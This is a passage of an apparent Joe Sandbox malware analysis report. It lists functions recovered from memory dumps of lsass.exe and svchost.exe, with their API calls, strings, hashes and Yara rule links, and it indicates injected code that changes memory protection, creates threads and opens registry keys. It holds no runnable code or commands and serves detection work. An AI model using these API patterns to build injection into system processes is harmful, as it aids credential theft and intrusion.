Instruction ID: 972f85bd260c2ee75a15eccb82eca9add97efd3e6d8f92d2c71b54b9a0724d42
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 07518832601A028EEF64CB16F44CB1937A5F3D4BD8F558526DA1747B8CEB39DE418B04

Function 000002D6F14E83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D6F14E8413
_IsNonwritableInCurrentImage.LIBCMT ref: 000002D6F14E84A8

Strings

csm, xrefs: 000002D6F14E848E
f, xrefs: 000002D6F14E8426

Memory Dump Source

Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: fac092133bcf5273d306a1bfba47854e7a8849c5731493164c1dc531c6143850
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: D6314672601A419AEB14DF12F84CB5977A4F780BD8F15852AAE6B07B8CDB3CCE41CB04

Function 000002D6F1522058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002D6F15220D7
WriteFile.KERNEL32 ref: 000002D6F152239F
WriteFile.KERNEL32 ref: 000002D6F15223E5
GetLastError.KERNEL32 ref: 000002D6F152249B

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction ID: 46840878b0cc5d224b34d7d0e9dac87f5955736167c6a31398be0b02f4667bf4
Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction Fuzzy Hash: CED1BFB7714A808DE711CFA9E44829C3BB1F7547D8F14421ADE5E9BF99DA38C906C780

Function 000002D6F1582058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002D6F15820D7
WriteFile.KERNEL32 ref: 000002D6F158239F
WriteFile.KERNEL32 ref: 000002D6F15823E5
GetLastError.KERNEL32 ref: 000002D6F158249B

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction ID: dd6b672a2f53368aeb54a6d8b34fc846c483bef90cf2183bad398aa3b9cfd3a2
Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction Fuzzy Hash: B2D1D3B2728A808EE711CF69E44839C3BB1F3547E8F54421ADE5E97F99DA38C906C750

Function 000002D6F1522980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 000002D6F1522A9C
GetLastError.KERNEL32 ref: 000002D6F1522B27

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction ID: c9214aef26bfacb35296ae088b721dff4a15a35e123c9ee8ba9635ca1e8333b4
Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction Fuzzy Hash: 5A9177A7700E909DFB649F65A48C3AD2BA0A754BC8F54410EDE4F67E95DB78C882C700

Function 000002D6F1582980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 000002D6F1582A9C
GetLastError.KERNEL32 ref: 000002D6F1582B27

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction ID: c2b03503795149f622d0d89a93b7de4d96344e6466bbe8adc369801a5628b75e
Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction Fuzzy Hash: 1D918DB2628E509EF7609F65A45C3AD2FA0B744BE8F54410EDE4F67E95DA38CC82C700

Function 000002D6F1517960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000002D6F151798C
GetCurrentThreadId.KERNEL32 ref: 000002D6F151799A
GetCurrentProcessId.KERNEL32 ref: 000002D6F15179A6
QueryPerformanceCounter.KERNEL32 ref: 000002D6F15179B6

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction ID: 46c5aac05c874f4bb09711078cff6ceae9bbf1676f6b8508b6834c3418bbca38
Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction Fuzzy Hash: 30111C66710F418AEF008F60E8993A833A4F719798F440E22DE6E46BA4DB7CD5998380

Function 000002D6F1577960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000002D6F157798C
GetCurrentThreadId.KERNEL32 ref: 000002D6F157799A
GetCurrentProcessId.KERNEL32 ref: 000002D6F15779A6
QueryPerformanceCounter.KERNEL32 ref: 000002D6F15779B6

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction ID: fe0a85a94f7736e8f1811965c89875d15abe2672651892889c268e27fb3d6e1c
Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction Fuzzy Hash: 1111F166714F058AEF00CF60F85D3A833A4F7597A8F441D26DA6E46B95DB7CC5948380

Function 000002D6F157253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002D6F1572620
StrCpyW.SHLWAPI ref: 000002D6F1572639

Strings

\\.\pipe\, xrefs: 000002D6F157262B

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction ID: 2f4b7ab9b6b4d2fd4753ba052fc98d32996a35375249b626469eb73938ecf5d4
Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction Fuzzy Hash: E971C2A6200F894AE6659F26B94D3AAA7A4F3857D4F44801BDD0F47F89DF38CE458700

Function 000002D6F14E9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000002D6F14E9EB7

Strings

MOC, xrefs: 000002D6F14E9E7C
RCC, xrefs: 000002D6F14E9E85

Memory Dump Source

Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: d070504b4f6ab16698584910d28eb8b80bc01e4cc0e3f10349b5f2c037af8c0d
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 6E616B73600F848AEB20DF65E4583AD7BA0F784BD8F144216EF4A57B99DB38DA95C700

Function 000002D6F1512330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002D6F1512416
StrCpyW.SHLWAPI ref: 000002D6F151242D

Strings

\\.\pipe\, xrefs: 000002D6F1512421

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction ID: 394cc914bfb9ce43346b5ff93633d9b94699b0b3b218dfcc43da45d9579c068f
Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction Fuzzy Hash: 1951F5B2204B8189E6769F2AB09C3AA6BA1F3857C0F65412BDD4F27F49DA7DCD04C740

Function 000002D6F1572330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002D6F1572416
StrCpyW.SHLWAPI ref: 000002D6F157242D

Strings

\\.\pipe\, xrefs: 000002D6F1572421

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction ID: 6e761f3a21dc2246a1aef658ceb1943d5242180b715b5e1401853d8f59a56f5e
Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction Fuzzy Hash: 8A51D4B2218B8989E6749F2AB45D3AA6762F3857C0F44812BDD5F07F59EA3DCD048740

Function 000002D6F15226F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002D6F1522807
GetLastError.KERNEL32 ref: 000002D6F1522829

Strings

U, xrefs: 000002D6F15227B3

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction ID: 824dda5bf0e141a0eccdff39b2f392aa61083a03da449fe0be0865378a6b09d5
Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction Fuzzy Hash: 75419FB3314B808ADB208F25F84C3A9A7A1F7987D4F444126EE4E87B94EB7CC841CB40

Function 000002D6F15826F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002D6F1582807
GetLastError.KERNEL32 ref: 000002D6F1582829

Strings

U, xrefs: 000002D6F15827B3

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction ID: c53e148514c93bad0f2e7d8b5fe3954aa2b74c2c1402395441e27d63ee265e01
Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction Fuzzy Hash: BF4184B2729B408ADB209F25F44D39967A0F7987D4F504026EE4E87B94EB3CC841CB40

Function 000002D6F15194A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002D6F15194F0
RaiseException.KERNEL32 ref: 000002D6F1519531

Strings

csm, xrefs: 000002D6F151951E

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction ID: 0179ef454bca868754a89d0f14593ff5d1bafe773b9c0e76b87cdcda21dd5abb
Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction Fuzzy Hash: C6113A76214F8086EB618F15F458359B7E5FB88B98F594222EE8E17B68DF3CC951CB00

Function 000002D6F15794A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002D6F15794F0
RaiseException.KERNEL32 ref: 000002D6F1579531

Strings

csm, xrefs: 000002D6F157951E

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction ID: fc393b24a3cf5e93f96326cbc1deecc5d0ba1190469aa8f37d231bdb885e5442
Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction Fuzzy Hash: B4112E72214F4486EB618B25F45835977E5FB88BA4F588222DF8D07B58DF3CC951C700

Function 000002D6F14E7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000002D6F14E737C

Strings

ierarchy Descriptor', xrefs: 000002D6F14E7381
riptor at (, xrefs: 000002D6F14E7364

Memory Dump Source

Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: 42604dadee08075db72dd804d857af22540e6553bd8cf7546b60624dadb498d8
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: 2DE08661640F4594DF058F22F84829873A0DB99BA4F499123996D0B315FA3CD6F9C700

Function 000002D6F14E73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000002D6F14E73D8

Strings

Locator', xrefs: 000002D6F14E73DD
riptor at (, xrefs: 000002D6F14E73C0

Memory Dump Source

Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: d05b7e5c656130d9458ccdc22e0b75791a29142332b64578b38792f26bb6b93c
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: 41E08661640F4484DF058F21F8441987360E799B94B889123C96D0B355EA3CD5E5C700

Function 000002D6F1511BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002D6F1511C2D
HeapAlloc.KERNEL32 ref: 000002D6F1511C3B
GetProcessHeap.KERNEL32 ref: 000002D6F1511C77
HeapFree.KERNEL32 ref: 000002D6F1511C85

Part of subcall function 000002D6F151152C: StrCmpIW.SHLWAPI ref: 000002D6F151155D

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction ID: fd815924ccaf22e34c037317531bc049dc234f77afa6770aba1465aea0f85cca
Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction Fuzzy Hash: F5118C66601F8489EE05DF66F84C22973A1FB89FC4F18406ADE4E57B66DE3CD842C300

Function 000002D6F1571BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002D6F1571C2D
HeapAlloc.KERNEL32 ref: 000002D6F1571C3B
GetProcessHeap.KERNEL32 ref: 000002D6F1571C77
HeapFree.KERNEL32 ref: 000002D6F1571C85

Part of subcall function 000002D6F157152C: StrCmpIW.SHLWAPI ref: 000002D6F157155D

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction ID: 82ec88930908ede03a152f782d96b2ac71a5e30259151145052ab1b77e435860
Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction Fuzzy Hash: 92118265611F488AEF04DB66F44D22973A5F789FD0F588026DE4E57B66DE3CC842C300

Function 000002D6F1511268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002D6F151126E
HeapAlloc.KERNEL32 ref: 000002D6F151127D
GetProcessHeap.KERNEL32 ref: 000002D6F1511297
HeapAlloc.KERNEL32 ref: 000002D6F15112A8

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction ID: 5530d73242211928b6024003faf75465f242705db9492874eec173ea436ce9dc
Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction Fuzzy Hash: 48E092B6601A848AEB048F62E80C34A36E1FB8DF86F14C024CD0E07751DF7D98D9CB50

Function 000002D6F1571268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002D6F157126E
HeapAlloc.KERNEL32 ref: 000002D6F157127D
GetProcessHeap.KERNEL32 ref: 000002D6F1571297
HeapAlloc.KERNEL32 ref: 000002D6F15712A8

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction ID: b278347ed22e7151f603d1e85ffea4ffbaa701bac3e443c82d47137fe5257616
Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction Fuzzy Hash: 66E092B5621A048BEB048F62E80C34A36E1FB8DFA6F04C024C90E0B752EF7D88D9C750

Analysis Process: svchost.exePID: 928, Parent PID: 2120COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	74
Total number of Limit Nodes:	2

Executed Functions

Function 0000014E41FD328C Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000014E41FD32AE
PathFindFileNameW.SHLWAPI ref: 0000014E41FD32BD

Part of subcall function 0000014E41FD3844: StrCmpNIW.SHLWAPI ref: 0000014E41FD385C

Part of subcall function 0000014E41FD3790: GetModuleHandleW.KERNEL32 ref: 0000014E41FD379E
Part of subcall function 0000014E41FD3790: GetCurrentProcess.KERNEL32 ref: 0000014E41FD37CC
Part of subcall function 0000014E41FD3790: VirtualProtectEx.KERNEL32 ref: 0000014E41FD37EE
Part of subcall function 0000014E41FD3790: GetCurrentProcess.KERNEL32 ref: 0000014E41FD3809
Part of subcall function 0000014E41FD3790: VirtualProtectEx.KERNEL32 ref: 0000014E41FD382A

CreateThread.KERNEL32 ref: 0000014E41FD330B

Part of subcall function 0000014E41FD1D14: GetCurrentThread.KERNEL32 ref: 0000014E41FD1D1F

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction ID: 701d4b212a0684b59ab9b099f346debbb554c1cfb4979cb8b986742d3a5a455b
Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction Fuzzy Hash: CB1139B271864182FF60AB61BB1D3F9A3E4BF54344F5841259A0BC16B5EF7CC1468230

Function 0000014E41FD1ABC Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000014E41FD1628: GetProcessHeap.KERNEL32 ref: 0000014E41FD1633
Part of subcall function 0000014E41FD1628: HeapAlloc.KERNEL32 ref: 0000014E41FD1642
Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD16B2
Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD16DF
Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD16F9
Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1719
Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1734
Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1754
Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD176F
Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD178F
Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD17AA
Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD17CA

Sleep.KERNEL32 ref: 0000014E41FD1AD7
SleepEx.KERNELBASE ref: 0000014E41FD1ADD

Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD17E5
Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1805
Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1820
Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1840
Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD185B
Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD187B
Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1896
Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD18A0

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction ID: 27739bd1d7c2b649979a3e3ac9a2f5b2f111066e3f9e7ba65cc6bd2b1fdd864d
Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction Fuzzy Hash: 1231B771308A4182EF509B66DA593F9A3E4BF84BD0F0C55229E0BC76B6EF24C8538330

Function 0000014E41FD3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 0000014E41FD385C

Strings

dialer, xrefs: 0000014E41FD3855

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
Instruction ID: edc9b53c890d6efa8cfb08019f2e5464623e49ddff2869f1cd1f5de1b6805b2a
Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
Instruction Fuzzy Hash: 8BD05EB13117058AFF14DFAA88CD6B0A390BF04754F8C40208A0181660DB18C99E9620

Function 0000014E41FA273C Relevance: 1.7, APIs: 1, Instructions: 187
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000014E41FA285E

Memory Dump Source

